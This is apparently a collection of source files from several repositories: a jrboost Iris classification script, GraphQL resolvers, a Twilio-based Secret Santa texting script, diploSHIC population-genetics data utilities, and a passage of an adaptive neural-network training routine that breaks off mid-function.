validationParam = {
'threadCount': os.cpu_count() // 2,
'parallelTree': False,
'foldCount': 10,
}
trainParam = {
'minimizeAlgorithm': jrboost.minimizePopulation,
'repetionCount': 1,
'foldCount': 3,
'targetLossFun': jrboost.logLoss,
'boostParamGrid': {
'iterationCount': [300],
'eta': [0.001, 0.0015, 0.002, 0.003, 0.005, 0.007, 0.01, 0.015, 0.02, 0.03, 0.05, 0.07, 0.1, 0.15, 0.2, 0.3, 0.5, 0.7, 1.0],
'usedSampleRatio': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
'usedVariableRatio': [0.5],
'minNodeSize': [1, 2, 3],
'maxTreeDepth': [1, 2, 3, 4],
'minRelSampleWeight': [0.01],
#'saveMemory': [True],
#'stratifiedSamples': [False],
'selectVariablesByLevel': [True],
#'fastExp': [False],
},
'minimizeParam' : {
'populationCount': 100,
'survivorCount': 50,
'cycleCount': 2,
'bestCount': 10,
}
}
#-----------------------------------------------------------------------------------------------------------------------
def main():
print(f'validation: {validationParam}\n')
print(f'train: {trainParam}\n')
if 'threadCount' in validationParam: jrboost.setThreadCount(validationParam['threadCount'])
if 'parallelTree' in validationParam: jrboost.setParallelTree(validationParam['parallelTree'])
outerFoldCount = validationParam['foldCount']
inDataFrame, outDataSeries = loadData()
outDataFrame = jrboost.oneHotEncode(outDataSeries)
samples = outDataFrame.index
variables = inDataFrame.columns
labels = outDataFrame.columns
print(f'{len(samples)} samples, {len(variables)} variables\n')
confusionFrame = pd.DataFrame(index = labels, columns = labels, data = 0)
inData = inDataFrame.to_numpy(dtype = np.float32)
for i in itertools.count():
print(f'-------------------- {i} --------------------\n')
t = -time.time()
jrboost.PROFILE.START()
predOutDataFrame = pd.DataFrame(index = samples, columns = labels, dtype = np.float64)
for label in labels:
print(label)
outData = outDataFrame[label].to_numpy(dtype = np.uint64)
predOutData = np.empty((len(samples),))
folds = jrboost.stratifiedRandomFolds(outData, outerFoldCount)
for trainSamples, testSamples in folds:
trainInData = inData[trainSamples, :]
trainOutData = outData[trainSamples]
_, predictor, medianBoostParam = jrboost.train(trainInData, trainOutData, trainParam)
print(formatBoostParam(medianBoostParam))
testInData = inData[testSamples, :]
predOutData[testSamples] = predictor.predict(testInData)
predOutDataFrame[label] = predOutData
print()
print()
t += time.time()
print(jrboost.PROFILE.STOP())
print(f'{t:.2f}s\n')
predOutDataSeries = predOutDataFrame.idxmax(axis = 1)
for sample in samples:
confusionFrame.loc[outDataSeries[sample], predOutDataSeries[sample]] += 1
print((confusionFrame / (i + 1)).to_string(float_format = lambda x: f'{x:.2f}') + '\n')
#-----------------------------------------------------------------------------------------------------------------------
def loadData():
dataPath = '../Data/Iris/Iris.csv'
dataFrame = pd.read_csv(dataPath, sep = ',', index_col = 0)
outDataSeries = dataFrame['Species']
inDataFrame = dataFrame.drop(['Species'], axis = 1)
return inDataFrame, outDataSeries
def formatBoostParam(boostParam):
eta = boostParam['eta']
md = boostParam.get('maxTreeDepth', 1)
usr = boostParam['usedSampleRatio']
mns = boostParam['minNodeSize']
return f' eta = {eta:.4f} md = {md} usr = {usr:.1f} mns = {mns}'
#-----------------------------------------------------------------------------------------------------------------------
main()
#result (average of 100 runs)
#
#Species Iris-setosa Iris-versicolor Iris-virginica
#Species
#Iris-setosa 50.0 0.00 0.00
#Iris-versicolor 0.0 46.85 3.15
#Iris-virginica 0.0 3.22 46.78
``` |
{
"source": "jradek/python-rest-vs-graphql",
"score": 2
} |
#### File: graphql/schema/author.py
```python
from data import Author, all_authors, get_author
from graphql.type.definition import GraphQLResolveInfo
from schema.types import query
AUTHOR_TYPEDEF = """
type Author {
id: ID!
name: String!
}
"""
@query.field("authors")
def resolve_authors(_, info: GraphQLResolveInfo):
return all_authors()
@query.field("author")
def resolve_author(_, info: GraphQLResolveInfo, id: str) -> Author:
return get_author(int(id))
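# Example query (added; assumes the Query type exposes the 'author' and
# 'authors' fields these resolvers are bound to):
#
# query {
# author(id: "1") { id name }
# }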
``` |
{
"source": "jradis/secretsanta",
"score": 3
} |
#### File: jradis/secretsanta/secretsanta.py
```python
import pandas as pd
from twilio.rest import Client
import random
import giphy_client
from giphy_client.rest import ApiException
import time
########################
# SET CONSTANT VARIABLES
########################
santa_message = '''{0}, you have the pleasure of participating in this years friends' gift exchange! Santa has picked you to give a gift to {1}. Date of the Christmas party is TBD. Just make sure you don\'t fuck it up... Oh, and Merry Christmas!!! Ho Ho HO!!!'''
elf_message_1 = '''{0}, you have been chosen to be head elf for a gift exchange. Lucky You. Someone Trusts and/or loves you... Or has nobody else to turn to... lol... Anyways, here is a list of each person, their number and who they are assigned to give a gift. It\'s likely you wont be contacted but in the case that you are it is probably because someone fucked up and forgot who they have. Thanks for being loved!!! Oh, and Merry Christmas!!!'''
elf_message_2 = '''Anyways, here is their info and who has who, just in case:'''
TESTING = False  # When True, the random seed is fixed at 7 and results are only printed for verification. When False, the seed is set to 13 and the text messages are actually sent.
########################
##############################
# LOAD CONFIGURATION VARIABLES
##############################
# SET RANDOM SEED
if TESTING:
random.seed(7)
else:
random.seed(13)
# GET API INFO AND KEYS
config_info = pd.read_csv('api_config.csv')
ACCOUNT = config_info.loc[config_info['key'] == 'ACCOUNT']['value'].values[0] # Twilio Account
AUTH = config_info.loc[config_info['key'] == 'AUTH']['value'].values[0] # Twilio API Key
FROM = config_info.loc[config_info['key'] == 'FROM']['value'].values[0] # Twilio Phone Number
GIPHY = config_info.loc[config_info['key'] == 'GIPHY']['value'].values[0] # GIPHY API Key
# Configure Twilio Client
client = Client(ACCOUNT, AUTH)
##############################
##################
# HELPER FUNCTIONS
##################
def add_christmas_gify():
return '{0}'.format(get_random_santa_gif())
def get_random_santa_gif(api_key=GIPHY, tag='christmas', rating='PG-13', fmt='json'):
api_instance = giphy_client.DefaultApi()
api_key = api_key
tag = tag
rating = rating
fmt = fmt
try:
# Random Sticker Endpoint
api_response = api_instance.gifs_random_get(api_key, tag=tag, rating=rating, fmt=fmt)
return api_response.to_dict()['data']['image_original_url']
except ApiException as e:
print("Exception when calling DefaultApi->stickers_random_get: %s\n" % e)
return None
def send_sms(body, test, TO, client=client, FROM=FROM, media=None):
if test:
print('MSG:', body)
print('Number:', TO)
print('Media:', media)
else:
client.messages.create(
to=TO,
from_=FROM,
body=body,
media_url=media)
time.sleep(10) # Adding to try and avoid getting marked as spam by carrier
##################
#############
# PICK SANTAS
#############
# Parse persons info
people_info = pd.read_csv('santas.csv', dtype={'number': 'str'})
santas_info = people_info.loc[people_info['type'] == 'Santa'][['name', 'number', 'relationship']]
## To-do Split relationships directly from csv. Auto-detect if relationships exist.
relationships = santas_info[~santas_info['relationship'].isnull()].set_index('name').to_dict()['relationship']
santas_info = santas_info[['name', 'number']].set_index('name').to_dict('index')
elf_info = people_info.loc[people_info['type'] != 'Santa'][['name', 'number']]
santas = list(santas_info.keys())
options = list(santas_info.keys())
random.shuffle(santas)
random.shuffle(options)
# Elegantly making it so you don't ever have to reshuffle.
# pick random relationship to set to first and second to last
coupled = random.choice(list(relationships.keys()))
# Set one member of the couple to be the very first of the santas
santas.insert(0, santas.pop(santas.index(coupled)))
# Move the other member of the relationship to be the second to last.
santas.insert(-1, santas.pop(santas.index(relationships[coupled])))
# Move the other member of the relationship to be the very first position of the options
options.insert(0, options.pop(options.index(relationships[coupled])))
# If the last santa is also in a relationship, make sure that that
if santas[-1] in relationships.keys():
options.insert(0, options.pop(options.index(santas[-1])))
options.insert(0, options.pop(options.index(relationships[options[0]])))
pairs = {}
for i, santa in enumerate(santas):
if i == 0:
gives_to = santas[-1]
options.remove(santas[-1])
pairs[santa] = gives_to
else:
bad_match = [santa]
if santa in relationships.keys():
bad_match.append(relationships[santa])
if options[0] not in bad_match:
gives_to = options[0]
elif options[1] not in bad_match:
gives_to = options[1]
else:
gives_to = options[2]
options.remove(gives_to)
pairs[santa] = gives_to
#############
###############
# SEND MESSAGES
###############
for pair in pairs:
santas_info[pair]['gives to'] = pairs[pair]
to_num = santas_info[pair]['number']
msg = santa_message.format(pair, pairs[pair])
send_sms(msg, TO=to_num, test=TESTING, media=add_christmas_gify())
send_sms(elf_message_1.format(elf_info.name.values[0]), TO=elf_info.number.values[0], test=TESTING, media=add_christmas_gify())
time.sleep(60) # Adding to try and avoid getting marked as spam by carrier
send_sms(elf_message_2 + '\n\n' + str(santas_info), TO=elf_info.number.values[0], test=TESTING)
#############
``` |
{
"source": "jradrion/diploSHIC",
"score": 2
} |
#### File: jradrion/diploSHIC/makeTrainingSets.py
```python
import sys, os, random
neutTrainingFileName, softTrainingFilePrefix, hardTrainingFilePrefix, sweepTrainingWindows, linkedTrainingWindows, outDir = sys.argv[1:]
#sweepTrainingWindows and linkedTrainingWindows are comma-separated lists
sweepFilePaths, linkedFilePaths = {}, {}
for trainingFilePrefix in [softTrainingFilePrefix, hardTrainingFilePrefix]:
trainingSetDir = "/".join(trainingFilePrefix.split("/")[:-1])
trainingFilePrefixDirless = trainingFilePrefix.split("/")[-1]
linkedWins = [int(x) for x in linkedTrainingWindows.split(",")]
sweepWins = [int(x) for x in sweepTrainingWindows.split(",")]
linkedFilePaths[trainingFilePrefix] = []
sweepFilePaths[trainingFilePrefix] = []
for fileName in os.listdir(trainingSetDir):
if fileName.startswith(trainingFilePrefixDirless):
winNum = int(fileName.split("_")[1].split(".")[0])
if winNum in linkedWins:
linkedFilePaths[trainingFilePrefix].append(trainingSetDir + "/" + fileName)
elif winNum in sweepWins:
sweepFilePaths[trainingFilePrefix].append(trainingSetDir + "/" + fileName)
def getExamplesFromFVFile(simFileName):
try:
simFile = open(simFileName,'rt')
lines = [line.strip() for line in simFile.readlines() if not "nan" in line]
header = lines[0]
examples = lines[1:]
simFile.close()
return header, examples
except Exception:
return "", []
def getExamplesFromFVFileLs(simFileLs):
examples = []
keptHeader = ""
for filePath in simFileLs:
header, currExamples = getExamplesFromFVFile(filePath)
if header:
keptHeader = header
examples += currExamples
return keptHeader, examples
def getMinButNonZeroExamples(lsLs):
counts = []
for ls in lsLs:
if len(ls) > 0:
counts.append(len(ls))
if not counts:
raise Exception
return min(counts)
header, neutExamples = getExamplesFromFVFile(neutTrainingFileName)
linkedSoftHeader, linkedSoftExamples = getExamplesFromFVFileLs(linkedFilePaths[softTrainingFilePrefix])
softHeader, softExamples = getExamplesFromFVFileLs(sweepFilePaths[softTrainingFilePrefix])
linkedHardHeader, linkedHardExamples = getExamplesFromFVFileLs(linkedFilePaths[hardTrainingFilePrefix])
hardHeader, hardExamples = getExamplesFromFVFileLs(sweepFilePaths[hardTrainingFilePrefix])
trainingSetLs = [linkedSoftExamples, softExamples, linkedHardExamples, hardExamples,neutExamples]
numExamplesToKeep = getMinButNonZeroExamples(trainingSetLs)
for i in range(len(trainingSetLs)):
random.shuffle(trainingSetLs[i])
trainingSetLs[i] = trainingSetLs[i][:numExamplesToKeep]
linkedSoftExamples, softExamples, linkedHardExamples, hardExamples, neutExamples = trainingSetLs
outFileNames = ["neut.fvec", "linkedSoft.fvec", "soft.fvec", "linkedHard.fvec", "hard.fvec"]
outExamples = [neutExamples, linkedSoftExamples, softExamples, linkedHardExamples, hardExamples]
for i in range(len(outFileNames)):
if outExamples[i]:
outFile = open(outDir +"/"+ outFileNames[i], "w")
outFile.write(hardHeader+"\n")
for example in outExamples[i]:
outFile.write("%s\n" %(example))
outFile.close()
```
#### File: jradrion/diploSHIC/msTools.py
```python
import sys
import gzip
import bisect
def getSnpsOverflowingChr(newPositions, totalPhysLen):
overflowers = []
for i in reversed(range(len(newPositions))):
if newPositions[i] > totalPhysLen:
overflowers.append(newPositions[i])
return overflowers
def fillInSnpSlotsWithOverflowers(newPositions, totalPhysLen, overflowers):
posH = {}
for pos in newPositions:
posH[pos] = 1
for i in range(len(overflowers)):
del newPositions[-1]
for pos in reversed(range(1, totalPhysLen+1)):
if pos not in posH:
bisect.insort_left(newPositions, pos)
overflowers.pop()
if len(overflowers) == 0:
break
def msPositionsToIntegerPositions(positions, totalPhysLen):
snpNum = 1
prevPos = -1
prevIntPos = -1
newPositions = []
for position in positions:
assert position >= 0 and position < 1., "Mutations positions must all be in [0, 1)"
assert position >= prevPos
origPos = position
if position == prevPos:
position += 0.000001
prevPos = origPos
intPos = int(totalPhysLen*position)
if intPos == 0:
intPos = 1
if intPos <= prevIntPos:
intPos = prevIntPos + 1
prevIntPos = intPos
newPositions.append(intPos)
overflowers = getSnpsOverflowingChr(newPositions, totalPhysLen)
if overflowers:
fillInSnpSlotsWithOverflowers(newPositions, totalPhysLen, overflowers)
assert len(newPositions) == len(positions)
assert all(newPositions[i] <= newPositions[i+1]
for i in range(len(newPositions)-1))
assert newPositions[-1] <= totalPhysLen
return newPositions
def msRepToHaplotypeArrayIn(samples, positions, totalPhysLen, transposeHaps, discretizePositions=True):
for i in range(len(samples)):
assert len(samples[i]) == len(positions)
if discretizePositions:
positions = msPositionsToIntegerPositions(positions, totalPhysLen)
if transposeHaps:
hapArrayIn = []
for j in range(len(positions)):
hapArrayIn.append([])
for i in range(len(samples)):
hapArrayIn[j].append(samples[i][j])
else:
hapArrayIn = samples
return hapArrayIn, positions
def msOutToHaplotypeArrayIn(msOutputFileName, totalPhysLen, discretizePositions=True):
if msOutputFileName == "stdin":
isFile = False
msStream = sys.stdin
else:
isFile = True
if msOutputFileName.endswith(".gz"):
msStream = gzip.open(msOutputFileName, 'rt')
else:
msStream = open(msOutputFileName, 'rt')
header = msStream.readline()
program, numSamples, numSims = header.strip().split()[:3]
numSamples, numSims = int(numSamples), int(numSims)
hapArraysIn = []
positionArrays = []
# advance to first simulation
line = msStream.readline()
while line.strip() != "//":
line = msStream.readline()
while line:
if line.strip() != "//":
sys.exit(
"Malformed ms-style output file: read '%s' instead of '//'. \n" % (line.strip())) # NOQA
segsitesBlah, segsites = msStream.readline().strip().split()
segsites = int(segsites)
if segsitesBlah != "segsites:":
sys.exit("Malformed ms-style output file. \n")
if segsites == 0:
positions = []
hapArrayIn = []
for i in range(numSamples):
hapArrayIn.append([])
else:
positionsLine = msStream.readline().strip().split()
if not positionsLine[0] == "positions:":
sys.exit("Malformed ms-style output file. \n")
positions = [float(x) for x in positionsLine[1:]]
samples = []
for i in range(numSamples):
sampleLine = msStream.readline().strip()
if len(sampleLine) != segsites:
sys.exit("Malformed ms-style output file %s segsites but %s columns in line: %s; line %s of %s samples \n" % # NOQA
(segsites, len(sampleLine), sampleLine, i, numSamples)) # NOQA
samples.append(sampleLine)
if len(samples) != numSamples:
raise Exception
hapArrayIn, positions = msRepToHaplotypeArrayIn(
samples, positions, totalPhysLen, True,
discretizePositions=discretizePositions)
hapArraysIn.append(hapArrayIn)
positionArrays.append(positions)
line = msStream.readline()
# advance to the next non-empty line or EOF
while line and line.strip() == "":
line = msStream.readline()
# sys.stderr.write("finished rep %d\n" %(len(hapArraysIn)))
if len(hapArraysIn) != numSims:
sys.exit("Malformed ms-style output file: %s of %s sims processed. \n" % # NOQA
(len(hapArraysIn), numSims))
if isFile:
msStream.close()
return hapArraysIn, positionArrays
def openMsOutFileForSequentialReading(msOutputFileName):
if msOutputFileName == "stdin":
isFile = False
msStream = sys.stdin
else:
isFile = True
if msOutputFileName.endswith(".gz"):
msStream = gzip.open(msOutputFileName, 'rt')
else:
msStream = open(msOutputFileName)
header = msStream.readline()
program, numSamples, numSims = header.strip().split()[:3]
numSamples, numSims = int(numSamples), int(numSims)
return (msStream, isFile), numSamples, numSims
def closeMsOutFile(fileInfoTuple):
msStream, isFile = fileInfoTuple
if isFile:
msStream.close()
def readNextMsRepToHaplotypeArrayIn(fileInfoTuple, numSamples, totalPhysLen, transposeHaps=True, discretizePositions=True):
msStream, isFile = fileInfoTuple
# advance to next simulation
line = msStream.readline()
while not line.strip().startswith("//"):
line = msStream.readline()
segsitesBlah, segsites = msStream.readline().strip().split()
segsites = int(segsites)
if segsitesBlah != "segsites:":
sys.exit("Malformed ms-style output file. \n")
if segsites == 0:
positions = []
hapArrayIn = []
for i in range(numSamples):
hapArrayIn.append([])
else:
positionsLine = msStream.readline().strip().split()
if not positionsLine[0] == "positions:":
sys.exit("Malformed ms-style output file. \n")
positions = [float(x) for x in positionsLine[1:]]
samples = []
for i in range(numSamples):
sampleLine = msStream.readline().strip()
if len(sampleLine) != segsites:
sys.exit("Malformed ms-style output file %s segsites but %s columns in line: %s; line %s of %s samples \n" % # NOQA
(segsites, len(sampleLine), sampleLine, i, numSamples)) # NOQA
samples.append(sampleLine)
if len(samples) != numSamples:
raise Exception
hapArrayIn, positions = msRepToHaplotypeArrayIn(
samples, positions, totalPhysLen, transposeHaps,
discretizePositions=discretizePositions)
return hapArrayIn, positions
def readNextMsRepToGameteStrs(fileInfoTuple, numSamples, totalPhysLen, discretizePositions=True):
return readNextMsRepToHaplotypeArrayIn(fileInfoTuple, numSamples, totalPhysLen, transposeHaps=False, discretizePositions=discretizePositions)
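# --- Usage sketch (not part of the original module) ---------------------------
# Reads each replicate sequentially instead of loading the whole file at once.
# The file name and the 100 kb physical length below are placeholder assumptions.
if __name__ == "__main__":
    fileInfo, nSamples, nSims = openMsOutFileForSequentialReading("example_ms_output.msOut")
    for rep in range(nSims):
        hapArrayIn, positions = readNextMsRepToHaplotypeArrayIn(fileInfo, nSamples, totalPhysLen=100000)
        sys.stderr.write("rep %d: %d segregating sites\n" % (rep, len(positions)))
    closeMsOutFile(fileInfo)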
``` |
{
"source": "jradrion/i-against-i",
"score": 2
} |
#### File: i-against-i/iai/trainer.py
```python
from iai.imports import *
from iai.sequenceBatchGenerator import *
from iai.helpers import *
from iai.simulator import *
from iai.networks import *
def runModels_adaptive(ModelFuncPointer,
ModelName,
TrainDir,
ValiDir,
TestDir,
NetworkDir,
ProjectDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
TrainParams=None,
ValiParams=None,
TestParams=None,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
initModel=None,
initWeights=None,
network=None,
nCPU = 1,
gpuID = 0,
rep=None,
admixture=None,
testGrid=0,
gridParams=None):
if gridParams:
gridPars = gridParams.split(",")
else:
gridPars = []
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
if(resultsFile == None):
# fall back to a results file named after the training directory (assumption: the caller normally provides resultsFile)
resultsFilename = os.path.basename(TrainDir) + ".p"
resultsFile = os.path.join("./results/",resultsFilename)
# Redefine modelSave and weightsSave
resultsFile = resultsFile.replace(".p","_adapt_1.p")
weightsSave = network[1].replace(".h5","_adapt_1.h5")
modelSave = network[0]
# If TestGenerator is called after model.fit the random shuffling is not the same, even with same seed
print("\nReading test set...")
x_test,y_test = TestGenerator.__getitem__(0)
ct = 1
last_acc = 0.0
acc_diff = 1.0
while acc_diff >= 0.001:
print("Adaptive training iteration %s..."%(ct))
if ct > 1:
## Resimulate using same params as those if tail of accuracy dist
## Identify test examples with lowest accuracy
#resim_ids = []
#deviation = []
#accuracy = []
#for i in range(y_test.shape[0]):
# if y_test[i][0] == 1.0:
# D = 1.0 - y_pred[i][0]
# deviation.append([D,i])
# accuracy.append(1.0-D)
# else:
# D = 1.0 - y_pred[i][1]
# deviation.append([D,i])
# accuracy.append(1.0-D)
#deviation = sorted(deviation)[math.ceil(y_test.shape[0]/10.0)*-1:]
#for d in deviation:
# resim_ids.append(d[1])
#resim_ids = np.array(resim_ids)
#mask = np.zeros(y_test.shape[0], dtype=bool)
#mask[resim_ids] = True
## Create directories for new training sims
#newTrainDir = TrainParams["treesDirectory"] + "_adapt"
#newValiDir = ValiParams["treesDirectory"] + "_adapt"
#for d in [newTrainDir, newValiDir]:
# if os.path.exists(d):
# shutil.rmtree(d)
# os.mkdir(d)
## Resimulate using new parameters
#dg_params = pickle.load(open(os.path.join(NetworkDir, "simPars.p"), "rb"))
#test_params = pickle.load(open(os.path.join(TestDir, "info.p"), "rb"))
#dg_train = Simulator(**dg_params)
#dg_vali = Simulator(**dg_params)
#dg_train.simulateAndProduceTrees(numReps=np.sum(mask)*100,direc=newTrainDir,simulator="msprime",nProc=nCPU,test_params=test_params,mask=mask)
#dg_vali.simulateAndProduceTrees(numReps=np.sum(mask)*5,direc=newValiDir,simulator="msprime",nProc=nCPU,test_params=test_params,mask=mask)
## Redefine the batch generators
#TrainGenerator = SequenceBatchGenerator(**TrainParams)
#ValidationGenerator = SequenceBatchGenerator(**ValiParams)
## Prep for loading weights from previous training iteration
#resultsFile = resultsFile.replace("_adapt_%s.p"%(ct-1),"_adapt_%s.p" %(ct))
#initModel = modelSave
#initWeights = weightsSave
#weightsSave = weightsSave.replace("_adapt_%s.h5"%(ct-1),"_adapt_%s.h5"%(ct))
## Resimulate, with sampling density of parameters is inversly proportional to test accuracy
train_params = pickle.load(open(os.path.join(TrainDir, "info.p"), "rb"))
vali_params = pickle.load(open(os.path.join(ValiDir, "info.p"), "rb"))
test_params = pickle.load(open(os.path.join(TestDir, "info.p"), "rb"))
x_unique = np.unique(test_params[gridPars[0]])
y_unique = np.unique(test_params[gridPars[1]])
X, Y = np.meshgrid(x_unique, y_unique)
# Identify test examples with lowest accuracy
# there has to be a better way to do this using np.where
binary_acc = []
print("Accuracy calculation...")
for i in range(y_test.shape[0]):
progress_bar((i+1)/y_test.shape[0])
if y_test[i][0] == 1.0:
if y_pred[i][0] >= 0.5:
binary_acc.append(1)
else:
binary_acc.append(0)
else:
if y_pred[i][1] >= 0.5:
binary_acc.append(1)
else:
binary_acc.append(0)
binary_acc = np.array(binary_acc)
print("\n")
nTrain = int(train_params["numReps"] * 1.0) # what is the size on the new training set relative to the original generated by iai-simulate
nVali = int(vali_params["numReps"] * 1.0)
nTest = int(test_params["numReps"]/(testGrid**2))
z = binary_acc
z = np.reshape(z, (x_unique.shape[0],
y_unique.shape[0],
int(np.divide(z.shape[0],
x_unique.shape[0] * y_unique.shape[0]))))
#print(np.sum(z,axis=2)+1)
z = np.divide(1,np.sum(z,axis=2)+1) # add 1 (so as to avoid divide by zero) and take inverse
#print(z)
c = 1 # increasing the constant, c, makes the weighting more extreme
z_norm = z**c / np.sum(z**c) # normalize
#print(z_norm)
#z_norm = z / np.linalg.norm(z) #Frobenius 2-norm
#z_norm /= z_norm.shape[0]
zTrain = np.rint(z_norm * nTrain)
zVali = np.rint(z_norm * nVali)
#print(zTrain)
#print(np.sum(zTrain))
#sys.exit()
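# Worked illustration of the weighting above (comments only, not executed): with a 2x2 grid and
# per-cell correct counts [[9, 1], [4, 0]], z = 1/(counts + 1) = [[0.1, 0.5], [0.2, 1.0]], which
# sums to 1.8; with c = 1, z_norm = z / 1.8, so the hardest cell (0 correct predictions)
# receives about 1.0/1.8 ~ 56% of the newly simulated training examples.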
# Create directories for new training sims
newTrainDir = TrainParams["treesDirectory"] + "_adapt"
newValiDir = ValiParams["treesDirectory"] + "_adapt"
newTestDir = TestParams["treesDirectory"] + "_adapt"
for d in [newTrainDir, newValiDir, newTestDir]:
if os.path.exists(d):
shutil.rmtree(d)
os.mkdir(d)
# Use new parameters
dg_params = pickle.load(open(os.path.join(NetworkDir, "simPars.p"), "rb"))
dg_params["seed"] = ct
dg_train = Simulator(**dg_params)
dg_vali = Simulator(**dg_params)
# set testGrid for the new test set
dg_params["testGrid"] = testGrid
dg_params["gridParams"] = gridParams
dg_test = Simulator(**dg_params)
# Simulate
print("Simulate train set:")
dg_train.simulateAndProduceTrees(numReps=int(np.sum(zTrain)),direc=newTrainDir,simulator="msprime",nProc=nCPU,X=X,Y=Y,Z=zTrain,gridPars=gridPars)
print("Simulate vali set:")
dg_vali.simulateAndProduceTrees(numReps=int(np.sum(zVali)),direc=newValiDir,simulator="msprime",nProc=nCPU,X=X,Y=Y,Z=zVali,gridPars=gridPars)
print("Simulate test set:")
dg_test.simulateAndProduceTrees(numReps=nTest,direc=newTestDir,simulator="msprime",nProc=nCPU)
## trim
maxSegSites = float("inf")
for nDir in [newTrainDir,newValiDir]:
S_min = min(pickle.load(open(os.path.join(nDir,"info.p"),"rb"))["segSites"])
maxSegSites = min(maxSegSites, S_min)
for nDir in [newTrainDir,newValiDir,newTestDir]:
print("\nTrimming genotype and position .npy files in %s to %s SNPs"%(nDir,maxSegSites))
numReps = pickle.load(open(os.path.join(nDir,"info.p"),"rb"))["numReps"]
for i in range(numReps):
Hfilepath = os.path.join(nDir, str(i) + "_haps.npy")
Pfilepath = os.path.join(nDir, str(i) + "_pos.npy")
H = np.load(Hfilepath)
P = np.load(Pfilepath)
H = H[:maxSegSites]
P = P[:maxSegSites]
np.save(Hfilepath,H)
np.save(Pfilepath,P)
progress_bar((i+1)/float(numReps))
# Redefine the batch generators
TrainGenerator = SequenceBatchGenerator(**TrainParams)
ValiParams['batchSize'] = 64
ValidationGenerator = SequenceBatchGenerator(**ValiParams)
TestParams['batchSize'] = nTest*(testGrid**2)
TestParams['shuffleExamples'] = False
TestGenerator = SequenceBatchGenerator(**TestParams)
# Prep for loading weights from previous training iteration
resultsFile = resultsFile.replace("_adapt_%s.p"%(ct-1),"_adapt_%s.p" %(ct))
initModel = modelSave
initWeights = weightsSave
weightsSave = weightsSave.replace("_adapt_%s.h5"%(ct-1),"_adapt_%s.h5"%(ct))
# Regenerate new test set
x_test,y_test = TestGenerator.__getitem__(0)
# Call the training generator
x,y = TrainGenerator.__getitem__(0)
## define model
model = ModelFuncPointer(x,y)
# Early stopping and saving the best weights
if ct > 1:
patience = 50
else:
patience = 50
callbacks_list = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=patience),
ModelCheckpoint(
filepath=weightsSave,
monitor='val_loss',
save_best_only=True)
]
if initWeights:
print("Loading model/weights from path!")
assert initModel != None
jsonFILE = open(initModel,"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(initWeights)
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
### include conditional for testing
#if ct > 1: ## include conditional for testing
history = model.fit(TrainGenerator,
steps_per_epoch=epochSteps,
epochs=numEpochs,
validation_data=ValidationGenerator,
use_multiprocessing=False,
callbacks=callbacks_list,
verbose=2)
# Write the network
if(network != None):
##serialize model to JSON
model_json = model.to_json()
with open(modelSave, "w") as json_file:
json_file.write(model_json)
# Load json and create model
if(network != None):
jsonFILE = open(modelSave,"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(weightsSave)
else:
print("Error: model and weights not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc = tf.metrics.CategoricalAccuracy()
# Predict on clean test examples
print("Predicting...")
y_pred = model.predict(x_test)
test_acc(y_test, y_pred)
new_acc = float(test_acc.result())
print('\nAdaptive iteration %s: test acc: %s' %(ct, new_acc))
print("Results written to: ",resultsFile)
history.history['loss'] = np.array(history.history['loss'])
history.history['val_loss'] = np.array(history.history['val_loss'])
history.history['predictions'] = np.array(y_pred)
history.history['Y_test'] = np.array(y_test)
history.history['name'] = ModelName
pickle.dump(history.history, open(resultsFile, "wb" ))
# Evaluate improvement in accuracy
acc_diff = new_acc - last_acc
last_acc = new_acc
if ct > 1:
print("\nAccuracy improvement relative to last iteration:",acc_diff)
# Plot training results
plotResultsSoftmax2Heatmap(resultsFile=resultsFile,saveas=resultsFile.replace(".p",".pdf"),admixture=admixture)
ct+=1
#if ct > 2:
# break
def predict_adaptive(ModelFuncPointer,
ModelName,
NetworkDir,
ProjectDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
test_info=None,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
init=None,
network=None,
nCPU = 1,
gpuID = 0,
paramsID = None,
admixture=None):
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
# Redefine modelSave and weightsSave
resultsFile = resultsFile.replace(".p","_adapt_1.p")
weightsSave = network[1].replace(".h5","_adapt_1.h5")
modelSave = network[0]
########### Prediction on adaptive iteration 1 #############
# Load json and create model
if(network != None):
jsonFILE = open(modelSave,"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(weightsSave)
else:
print("Error: model and weights not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean = tf.metrics.CategoricalAccuracy()
test_acc_adapt = tf.metrics.CategoricalAccuracy()
# Read all clean test data into memory
x_test, y_test = TestGenerator.__getitem__(0)
predictions = model.predict(x_test)
#replace predictions and Y_test in results file
history= pickle.load(open(resultsFile, "rb"))
tmp = []
for gr in test_info["gr"]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history["Y_test"] = np.array(tmp)
history['predictions'] = np.array(predictions)
#rewrite result file
newResultsFile = resultsFile.replace(".p","_params%s.p"%(paramsID))
print("new results written to: ",newResultsFile)
pickle.dump(history, open(newResultsFile, "wb"))
test_acc_clean(y_test, predictions)
# Determine number of adaptive iterations with improved accuracy
nthIter = 0
for f in glob.glob(os.path.join(NetworkDir,"testResults_adapt_*.pdf")):
nthIter+=1
nthIter-=1
########### Prediction on final adpative iteration #############
# Redefine modelSave and weightsSave
resultsFile = resultsFile.replace("_adapt_1.p","_adapt_%s.p"%(nthIter))
weightsSave = network[1].replace(".h5","_adapt_%s.h5"%(nthIter))
# Load json and create model
if(network != None):
jsonFILE = open(modelSave,"r")
loadedModel_adapt = jsonFILE.read()
jsonFILE.close()
